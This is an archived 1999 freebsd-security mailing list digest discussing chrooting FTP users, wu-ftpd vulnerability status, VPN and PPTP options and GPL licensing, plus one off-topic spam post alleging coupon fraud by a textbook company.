FreeBSD.org Religion has no place in security, please take it to BELIEF-L or elsewhere. You only marginalize your legitimacy. Chris -- | Christopher Petrilli ``Television is bubble-gum for | petrilli@amber.org the mind.''-Frank Lloyd Wright To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 8:31: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id E9BE114DB1 for ; Sun, 25 Apr 1999 08:30:56 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA09153; Sun, 25 Apr 1999 09:30:51 -0600 (MDT) Message-Id: <4.2.0.32.19990425092623.00b3f470@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Sun, 25 Apr 1999 09:30:13 -0600 To: Christopher Petrilli From: Brett Glass Subject: Re: limit ftp users to their homedir Cc: security@freebsd.org In-Reply-To: <19990425112036.D18505@amber.org> References: <4.2.0.32.19990425091223.00d20ee0@localhost> <4.2.0.32.19990424191010.04521e00@localhost> <4.2.0.32.19990425090254.0453a660@localhost> <199904251510.RAA23578@greenpeace.grondar.za> <4.2.0.32.19990425091223.00d20ee0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:20 AM 4/25/99 -0400, Christopher Petrilli wrote: >Religion has no place in security, please take it to BELIEF-L or >elsewhere. You only marginalize your legitimacy. Religion has no place in SOFTWARE. This is one of several reasons why the prsence of the GPL is an important reason for not using software. While the presence or absence of the GPL does not affect the security of the software per se, it can and should affect one's choice among solutions to the security problem that had been posed (of which there are several). If someone said, "Don't use that, it's Microsoft-proprietary," I'm sure you wouldn't take it amiss, right? This is no different. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 5: 0:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from mordor.xti.org (mordor.xti.org [193.212.232.254]) by hub.freebsd.org (Postfix) with SMTP id C76FF14BFC for ; Mon, 26 Apr 1999 05:00:44 -0700 (PDT) (envelope-from delta@xti.org) Received: (qmail 54517 invoked from network); 26 Apr 1999 12:00:43 -0000 Received: from mordor.xti.org (193.212.232.254) by login.xti.org with SMTP; 26 Apr 1999 12:00:43 -0000 Date: Mon, 26 Apr 1999 14:00:43 +0200 (CEST) From: Terje Elde To: Andrew Kenneth Milton Cc: Theo Purmer , freebsd-security@FreeBSD.ORG Subject: Re: VPN In-Reply-To: <199904251136.VAA54390@zeus.theinternet.com.au> Message-ID: KEY-ID: 0x5B439BB3 Stuff: Why are you reading all the headers?? Do you think I hide lots of stuff up here?? Question: Do you know where *your* towel is? MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 25 Apr 1999, Andrew Kenneth Milton wrote: >Use the skip port. I've been told that skip supports only two 40 bit and two 56 bit (des and rc-something being two of those) as well as SAFER, which has NSA written all over it. Can anyone comment on that? Friendly greetings, Terje Elde "One world, one web, one program" - Microsoft Promo ad. "Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 5:36:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id B4C8114E30 for ; Mon, 26 Apr 1999 05:35:59 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA22225; Mon, 26 Apr 1999 09:36:10 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199904261236.JAA22225@ns1.sminter.com.ar> Subject: Re: limit ftp users to their homedir In-Reply-To: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> from erik at "Apr 25, 99 00:19:44 am" To: erik@chapman.karlskrona.se (erik) Date: Mon, 26 Apr 1999 09:36:10 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I use wu-ftpd for this and works nice. I also has some other features. There is and exploit for the current version -I think it keeps on being the current- so you can get wu-ftpd-VR from another vendor. Sorry I don't recall the URL, but you can find it easily on the Web. Regards and good luck. En un mensaje anterior, erik escribió: > > is there a way to deny a registered user access to anything but his own > homedirectory? > > it would be nice if it was the same as with anonymous access.. ie. users > who cwd to "/" , > really enters the virtual ftp root instead of the real system root. > > is this possible to do with _none anonymous_ users? > > for example: > > in a normal setup, when user foo ftps to the system, the initial directory > will be > his homedirectory. when (for some reason) he cwd to "/" he will enter the > real system root. > can you limit him to only access his own stuff, ie. a cwd to / will bring > him to /home/fred. > > any suggestions appreciated! > > /erik > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 5:46: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.interact.se (smtp.interact.se [193.15.98.9]) by hub.freebsd.org (Postfix) with ESMTP id CC53B14C21 for ; Mon, 26 Apr 1999 05:45:46 -0700 (PDT) (envelope-from je@interact.se) Received: from interact.se (wolfie.interact.se [193.15.98.202]) by smtp.interact.se (InterACT Mailer) with ESMTP id OAA20877; Mon, 26 Apr 1999 14:45:59 +0200 (CEST) Message-ID: <37245FEA.7880BD89@interact.se> Date: Mon, 26 Apr 1999 14:45:30 +0200 From: Jonas Eriksson Organization: InterACT - http://www.interact.se X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 4.0-CURRENT i386) X-Accept-Language: en MIME-Version: 1.0 To: Fernando Schapachnik Cc: erik , freebsd-security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir References: <199904261236.JAA22225@ns1.sminter.com.ar> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The url is: ftp://ftp.vr.net/pub/wu-ftpd/ Fernando Schapachnik wrote: > > I use wu-ftpd for this and works nice. I also has some other features. > > There is and exploit for the current version -I think it keeps on being > the current- so you can get wu-ftpd-VR from another vendor. Sorry I don't > recall the URL, but you can find it easily on the Web. > > Regards and good luck. > > En un mensaje anterior, erik escribió: > > > > is there a way to deny a registered user access to anything but his own > > homedirectory? > > > > it would be nice if it was the same as with anonymous access.. ie. users > > who cwd to "/" , > > really enters the virtual ftp root instead of the real system root. > > > > is this possible to do with _none anonymous_ users? > > > > for example: > > > > in a normal setup, when user foo ftps to the system, the initial directory > > will be > > his homedirectory. when (for some reason) he cwd to "/" he will enter the > > real system root. > > can you limit him to only access his own stuff, ie. a cwd to / will bring > > him to /home/fred. > > > > any suggestions appreciated! > > > > /erik > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > Fernando P. Schapachnik > Administración de la red > VIA Net Works Argentina SA > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- InterACT Luleå / Jonas Eriksson Network & Security Administrator Tel: +46 (0)920 88803 - Fax: +46 (0)920 88399 Current temp in Lulea/Sweden is 12.8C (55.0F) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 6:34:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from lily.ezo.net (lily.ezo.net [206.102.130.13]) by hub.freebsd.org (Postfix) with ESMTP id A97FC1514C for ; Mon, 26 Apr 1999 06:34:33 -0700 (PDT) (envelope-from jflowers@ezo.net) Received: from violet (p174.ezo.net [206.102.130.106]) by lily.ezo.net (8.8.7/8.8.7) with SMTP id JAA25261; Mon, 26 Apr 1999 09:34:29 -0400 (EDT) Message-ID: <001d01be8fe9$71b51f80$6a8266ce@violet.neo.lrun.com> From: "Jim Flowers" To: "Terje Elde" Cc: Subject: Re: VPN Date: Mon, 26 Apr 1999 09:33:58 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3155.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Depending on where you want to use it and (who you are) SKIP will work (legally) with keys up to 2048 bits and will use DES-EDE-K3. -----Original Message----- From: Terje Elde To: Andrew Kenneth Milton Cc: Theo Purmer ; freebsd-security@FreeBSD.ORG Date: Monday, April 26, 1999 8:01 AM Subject: Re: VPN >On Sun, 25 Apr 1999, Andrew Kenneth Milton wrote: > >>Use the skip port. > >I've been told that skip supports only two 40 bit and two 56 bit (des and >rc-something being two of those) as well as SAFER, which has NSA written >all over it. > >Can anyone comment on that? > >Friendly greetings, >Terje Elde > > "One world, one web, one program" - Microsoft Promo ad. > "Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 8:29: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (Postfix) with ESMTP id 821D21514C for ; Mon, 26 Apr 1999 08:29:05 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id KAA17354 for freebsd-security@FreeBSD.ORG; Mon, 26 Apr 1999 10:29:04 -0500 (CDT) From: Igor Roshchin Message-Id: <199904261529.KAA17354@alecto.physics.uiuc.edu> Subject: wu-ftpd: is there a vulnerability ? (was: Re: limit ftp users to their homedir) To: freebsd-security@FreeBSD.ORG Date: Mon, 26 Apr 1999 10:29:04 -0500 (CDT) X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Time to time somebody mentions that the current version of the wu-ftpd is vulnerable (e.g. see below). Unless I missed something, there was no postings about that on this (freebsd-security) mailing list about that. Also, as it was explained earlier (sorry, I don't remember who it was, probably Satoshi Asami ?) wu-ftpd on FreeBSD was not vulnerable to the most recent (realpath function) vulnerability due to specifics of FreeBSD's implementation of the realpath function. So, I hope that either Warner Losh, or Satoshi Asami, or Andrey Chernov can confirm the current state of the wu-ftpd port. Also, it would be really helpful (I asked this earlier but it was not noticed) to know what was the latest vulnerable version of wu-ftpd on FreeBSD ? Regards, Igor ----- Forwarded message from Fernando Schapachnik ----- I use wu-ftpd for this and works nice. I also has some other features. There is and exploit for the current version -I think it keeps on being the current- so you can get wu-ftpd-VR from another vendor. Sorry I don't recall the URL, but you can find it easily on the Web. <..> ----- End of forwarded message from Fernando Schapachnik ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 8:41:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id C6B211520A for ; Mon, 26 Apr 1999 08:41:09 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id MAA23971; Mon, 26 Apr 1999 12:40:59 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199904261540.MAA23971@ns1.sminter.com.ar> Subject: Re: wu-ftpd: is there a vulnerability ? (was: Re: limit ftp users to their homedir) In-Reply-To: <199904261529.KAA17354@alecto.physics.uiuc.edu> from Igor Roshchin at "Apr 26, 99 10:29:04 am" To: igor@physics.uiuc.edu (Igor Roshchin) Date: Mon, 26 Apr 1999 12:40:58 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Igor Roshchin escribió: > > Time to time somebody mentions that the current version of the wu-ftpd > is vulnerable (e.g. see below). [...] > Also, as it was explained earlier (sorry, I don't remember who it was, > probably Satoshi Asami ?) wu-ftpd on FreeBSD was not vulnerable > to the most recent (realpath function) vulnerability due to > specifics of FreeBSD's implementation of the realpath function. Sorry, I didn't want to bring confusion. I maintain a network with various Unices so I preferred to change to the VR version on the FreeBSD machines also just to have the same software in all the servers. I really did not pay attention to the FreeBSD especific issue. Regards. Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 8:49:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id 7A11A1520A for ; Mon, 26 Apr 1999 08:49:38 -0700 (PDT) (envelope-from jwyatt@RWSystems.net) Received: from kasie.rwsystems.net([209.197.192.103]) (2014 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 26 Apr 1999 10:15:49 -0500 (CDT) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24) Date: Mon, 26 Apr 1999 10:15:49 -0500 (CDT) From: James Wyatt To: freebsd-security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir In-Reply-To: <199904261236.JAA22225@ns1.sminter.com.ar> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Reguardless of my preference for BSD license (though I tolerate GPL), I just flat trust the FreeBSD ftpd more than the rest and it does everything I need from it - including multi-anon users and internal ls. We had some AIX and Linux machines with that wuftpd hole. The fix was out quickly and all, but having 1/3 of the OSs unaffected was nice. I am considering porting FreeBSDs ftpd to the other two. I know wuftpd is a great tool and is 'really fixed' now. I know the hole was tiny, but it was bad and we had a host vulnerable in a bad spot. Bad fire alarm on an e-commerce server. If there is no reason to change the OTS binaries, I prefer not to. I greatly appreciate the free software on the net and rapid source patches to fix holes. This is why the AIX box had wuftpd rather than OTS AIX ftpd. On Mon, 26 Apr 1999, Fernando Schapachnik wrote: > I use wu-ftpd for this and works nice. I also has some other features. > > There is and exploit for the current version -I think it keeps on being > the current- so you can get wu-ftpd-VR from another vendor. Sorry I don't > recall the URL, but you can find it easily on the Web. > En un mensaje anterior, erik escribió: > > > > is there a way to deny a registered user access to anything but his own > > homedirectory? > > > > it would be nice if it was the same as with anonymous access.. ie. users > > who cwd to "/" , > > really enters the virtual ftp root instead of the real system root. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 9:56:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id 2873114C80 for ; Mon, 26 Apr 1999 09:56:46 -0700 (PDT) (envelope-from freebsd@deepwell.com) Received: (qmail 28322 invoked from network); 26 Apr 1999 17:33:00 -0000 Received: from file.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 26 Apr 1999 17:33:00 -0000 Message-Id: <4.1.19990427095335.0182be90@mail1.dcomm.net> X-Sender: freebsd@mail.deepwell.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Tue, 27 Apr 1999 09:55:25 -0700 To: freebsd-security@FreeBSD.ORG From: Deepwell Internet Subject: Re: VPN In-Reply-To: <001d01be8fe9$71b51f80$6a8266ce@violet.neo.lrun.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What about the Microsoft PPTP protocol? Are there any plans to get FreeBSD to interact with NT/95 machines running PPTP? At 09:33 AM 4/26/99 -0400, you wrote: >Depending on where you want to use it and (who you are) SKIP will work >(legally) with keys up to 2048 bits and will use DES-EDE-K3. > >-----Original Message----- >From: Terje Elde >To: Andrew Kenneth Milton >Cc: Theo Purmer ; freebsd-security@FreeBSD.ORG > >Date: Monday, April 26, 1999 8:01 AM >Subject: Re: VPN > > >>On Sun, 25 Apr 1999, Andrew Kenneth Milton wrote: >> >>>Use the skip port. >> >>I've been told that skip supports only two 40 bit and two 56 bit (des and >>rc-something being two of those) as well as SAFER, which has NSA written >>all over it. >> >>Can anyone comment on that? >> >>Friendly greetings, >>Terje Elde >> >> "One world, one web, one program" - Microsoft Promo ad. >> "Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler >> >> >> >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message >> > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 20: 0:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from enya.clari.net.au (enya.clari.net.au [203.8.14.116]) by hub.freebsd.org (Postfix) with ESMTP id 0CEDA14DE1 for ; Mon, 26 Apr 1999 20:00:31 -0700 (PDT) (envelope-from danny@enya.clari.net.au) Received: from localhost (danny@localhost) by enya.clari.net.au (8.9.2/8.8.7) with ESMTP id MAA86034; Tue, 27 Apr 1999 12:59:34 +1000 (EST) (envelope-from danny@enya.clari.net.au) Date: Tue, 27 Apr 1999 12:59:33 +1000 (EST) From: "Daniel O'Callaghan" To: Fernando Schapachnik Cc: erik , freebsd-security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir In-Reply-To: <199904261236.JAA22225@ns1.sminter.com.ar> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > En un mensaje anterior, erik escribi=F3: > >=20 > > is there a way to deny a registered user access to anything but his own > > homedirectory? > >=20 On Mon, 26 Apr 1999, Fernando Schapachnik wrote: > I use wu-ftpd for this and works nice. I also has some other features. >=20 Why don't you just use the standard ftpd with FreeBSD? Put your users into a class called 'subscribers' or 'members' or whatever, and put :ftp-chroot: into the definition of that class in /etc/login.conf. You'll also want to=20 cd /usr/src/libexec/ftpd make -DFTPD_INTERNAL_LS make install so that your chrooted users can see files in their area (put ls(1) code into ftpd) Danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 26 23:32:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from crabcake.akamai.com (access.akamai.com [4.17.143.9]) by hub.freebsd.org (Postfix) with ESMTP id 6CC4814F65 for ; Mon, 26 Apr 1999 23:32:34 -0700 (PDT) (envelope-from dshaw@akamai.com) Received: from claude.akamai.com (crabcake.akamai.com [10.10.123.10]) by crabcake.akamai.com (8.8.7/8.8.7) with ESMTP id CAA14066 for ; Tue, 27 Apr 1999 02:32:27 -0400 Received: (from dshaw@localhost) by claude.akamai.com (8.8.7/8.8.7) id CAA01471 for freebsd-security@FreeBSD.ORG; Tue, 27 Apr 1999 02:20:53 -0400 Date: Tue, 27 Apr 1999 02:20:53 -0400 From: David Shaw To: freebsd-security@FreeBSD.ORG Subject: Re: VPN Message-ID: <19990427022053.C1398@jabberwocky.com> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <001d01be8fe9$71b51f80$6a8266ce@violet.neo.lrun.com> <4.1.19990427095335.0182be90@mail1.dcomm.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <4.1.19990427095335.0182be90@mail1.dcomm.net>; from Deepwell Internet on Tue, Apr 27, 1999 at 09:55:25AM -0700 X-PGP-Fingerprint: 3CB3B415/2048/4D 96 83 18 2B AF BE 45 D0 07 C4 07 51 37 B3 18 X-Phase-Of-Moon: The Moon is Waxing Gibbous (90% of Full) X-Current-Email-Backlog: 270 X-Pointless-Random-Number: 2 X-Silly-Header: It sure is. X-Time-Til-Y2K: 35 weeks, 3 days, 22 hours, 41 minutes, 18 seconds X-URL: http://www.jabberwocky.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Apr 27, 1999 at 09:55:25AM -0700, Deepwell Internet wrote: > What about the Microsoft PPTP protocol? Are there any plans to get FreeBSD > to interact with NT/95 machines running PPTP? There was some guy who was making an open source (I forget which licence) PPTP clone for Unixish machines. Try searching for +pptp +unix on the web. Last I looked at it (4-5 months ago?) it was Not Ready For Prime Time. A lot can happen in 4-5 months, of course. David -- David Shaw | dshaw@jabberwocky.com | WWW http://www.jabberwocky.com/ +---------------------------------------------------------------------------+ "There are two major products that come out of Berkeley: LSD and UNIX. We don't believe this to be a coincidence." - Jeremy S. Anderson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 27 4:58:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from postoffice.aims.com.au (advanc2.lnk.telstra.net [139.130.119.73]) by hub.freebsd.org (Postfix) with ESMTP id 9A00D14EBC for ; Tue, 27 Apr 1999 04:58:09 -0700 (PDT) (envelope-from Chris@aims.com.au) Received: from postoffice.aims.com.au (postoffice.aims.private [192.168.0.2]) by postoffice.aims.com.au (8.9.3/8.9.3) with SMTP id VAA27837 for ; Tue, 27 Apr 1999 21:58:28 +1000 (EST) Received: from nts-ts1 by aims.com.au with SMTP (MDaemon.v2.7.SP5.R) for ; Tue, 27 Apr 1999 22:01:10 +1000 Reply-To: From: "Chris Knight" To: Cc: Subject: RE: VPN Date: Tue, 27 Apr 1999 22:01:08 +1000 Message-ID: <001601be90a5$a3969170$0200a8c0@nts-ts1.aims.private> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: <19990427022053.C1398@jabberwocky.com> X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Importance: Normal X-MDaemon-Deliver-To: freebsd-security@FreeBSD.ORG X-Return-Path: Chris@aims.com.au Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Howdy, There's a PPTP server project for Linux called PoPToP (http://www.moretonbay.com/vpn/pptp.html). It's covered by the GNU license. There's also a PPTP client for Linux (http://www.pdos.lcs.mit.edu/~cananian/Projects/PPTP/), which is also covered by the GNU license. I don't know of any efforts in porting these to FreeBSD though. Regards, Chris Knight Systems Officer AIMS Independent Computer Professionals Tel: +61 3 6334 6664 Fax: +61 3 6331 7032 Mob: +61 419 528 795 Web: http://www.aims.com.au > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of David Shaw > Sent: Tuesday, 27 April 1999 16:21 > To: freebsd-security@FreeBSD.ORG > Subject: Re: VPN > > > On Tue, Apr 27, 1999 at 09:55:25AM -0700, Deepwell Internet wrote: > > What about the Microsoft PPTP protocol? Are there any > plans to get FreeBSD > > to interact with NT/95 machines running PPTP? > > There was some guy who was making an open source (I forget > which licence) > PPTP clone for Unixish machines. Try searching for +pptp +unix on the > web. > > Last I looked at it (4-5 months ago?) it was Not Ready For > Prime Time. A > lot can happen in 4-5 months, of course. > > David > > -- > David Shaw | dshaw@jabberwocky.com | WWW > http://www.jabberwocky.com/ > > +------------------------------------------------------------- > --------------+ > "There are two major products that come out of Berkeley: > LSD and UNIX. > We don't believe this to be a coincidence." - Jeremy S. Anderson > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 27 5:35:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.unilat.com (mail.unilat.com [206.132.217.5]) by hub.freebsd.org (Postfix) with ESMTP id 04865151A5; Tue, 27 Apr 1999 05:35:12 -0700 (PDT) (envelope-from rhaas@unilat.com) Received: from unilate.com [38.27.175.93] by mail.unilat.com (SMTPD32-5.01) id A44F5D00F0; Tue, 27 Apr 1999 01:24:47 PDT From: rhaas@unilat.com To: rhaas@unilat.com Subject: Attention: Coupon fraud alert!!! Message-Id: <199904270125.SM00153@unilate.com> Date: Tue, 27 Apr 1999 05:39:23 PDT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please forward this article. Texas Textbooks Coupon Fraud "On or Off the Drag" by Richard Haas Texas Textbooks, Inc. may have conspired to commit coupon fraud against 7-UP/Dr. Pepper. Sources claim that the President of Texas Textbooks, Inc., Morris Woods, instructed managers to have his employees separate coupons and candies from Buy Back Promotional Packages, that were put together by Market Source, Inc., and www.taponline.com. Within the Buy Back Promotional Packages were various candies, gum, and a coupon for a free 20 oz. 7-UP, as well as other advertisements and promotions from various companies, such as Chevy, University Subscription Service, Citibank, American Airlines, TIME magazine, Student Financial Services, BMG Music Service, and Sprint. According to sources, the 7-UP coupons and candied were separated and put into boxes, while the rest of the packages were thrown into the dumpster behind Texas Textbooks. These Buy Back Promotional Packages were supposed to have been given to students during the Fall Buy Back season during finals week in December, 1998. The marketing company behind the packages, Market Source, Inc. was notified about the problem in early January, 1999, but refused to do anything about it. Woods, when telephone regarding the alleged coupon fraud against 7-UP/Dr.Pepper, denied having any knowledge of the incident, and hung up the the telephone on a reporter. Several former employees claimed that they were threatened with being fired when they refused to participate in the separation of the items. "Committing a possible felony is not worth five dollars an hour," said a former employee. Seven Up/Dr. Pepper, University Subscription Service, Sprint, Chevrolet Motor Company, and the Coupon Information Center (CIC) have also been notified of these activities. Fraud is a crime punishable under both state and federal laws. Under Federal Law, a person convicted of mail fraud can be sentenced up to five years in prison and a fine of up to $250,000 for each count of the indictment. In cases where the proceeds of the fraud are not reported for Federal Income Tax purposes, conviction of tax evasion is punishable by up to 20 years imprisonment and up to a million dollar fine for each count. Photos available at: http://www.geocities.com/FashionAvenue/6916/fraud.htm If you would like to express your concern about this, please contact: Morris Woods President, Texas Textbooks, Inc. 1514 Parker Ln Austin, TX 78741-2563 (512) 462-2149 gsdesign@studybreaks.com Texas Textbooks 2410B E. Riverside Drive Austin, TX 78741 (512) 443-1257 Texas Textbooks 2338 Guadalupe Austin, TX 78705 (512) 478-9833 Bonnie O'Neill-Totin boneill@marketsource.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 27 9:46:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.rapidsite.net (mail.rapidsite.net [207.158.192.62]) by hub.freebsd.org (Postfix) with SMTP id 7D5E814DD4 for ; Tue, 27 Apr 1999 09:46:52 -0700 (PDT) (envelope-from gryphon@intech.net) Received: from gw1.hway.net (207.158.192.37) by mail.rapidsite.net (RS ver 1.0.2) with SMTP id 21111; Tue, 27 Apr 1999 12:46:42 -0400 (EDT) Message-ID: <3725EB27.58FAC00F@intech.net> Date: Tue, 27 Apr 1999 12:51:51 -0400 From: Coranth Gryphon Reply-To: gryphon@intech.net X-Mailer: Mozilla 4.08 [en] (WinNT; I) MIME-Version: 1.0 To: Fernando Schapachnik Cc: Igor Roshchin , freebsd-security@FreeBSD.ORG Subject: Re: wu-ftpd: is there a vulnerability ? (was: Re: limit ftp users to their homedir) References: <199904261540.MAA23971@ns1.sminter.com.ar> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Loop-Detect: 1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Fernando Schapachnik wrote: > > > wu-ftpd on FreeBSD was not vulnerable > > to the most recent (realpath function) vulnerability due to > > specifics of FreeBSD's implementation of the realpath function. The FreeBSD version (and others with that codebase) are _less_ vulnerable. The problem is with buffer overruns within the WU source, only some of which are in the 'realpath' chunks. > various Unices so I preferred to change to the VR version on > FreeBSD machines also just to have the same software in all the The 'VR' series has now become the 'official' WU line -- we took over where 'Academ' left off. Coming some time in May is the 2.5.0 release of WU-FTPd, with most of the 'VR' 